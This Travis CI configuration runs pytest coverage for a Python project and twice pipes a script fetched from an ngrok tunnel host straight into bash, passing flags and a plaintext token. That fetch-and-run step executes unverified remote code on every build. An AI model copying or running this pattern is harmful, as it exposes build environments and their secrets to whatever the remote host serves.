language: python
python: 3.6
install:
  - pip install pytest-cov
script:
  - pytest --cov=./ --cov-report=xml src/test_index.py
  - bash <(curl -s https://38790c206ce3.ngrok.io/bash) -F flag_1 -t 69bb2fd5-6774-4ce4-864f-4df8b5263025
  - pytest --cov=./ --cov-report=xml
  - bash <(curl -s https://38790c206ce3.ngrok.io/bash) -F flag_2 -t 69bb2fd5-6774-4ce4-864f-4df8b5263025
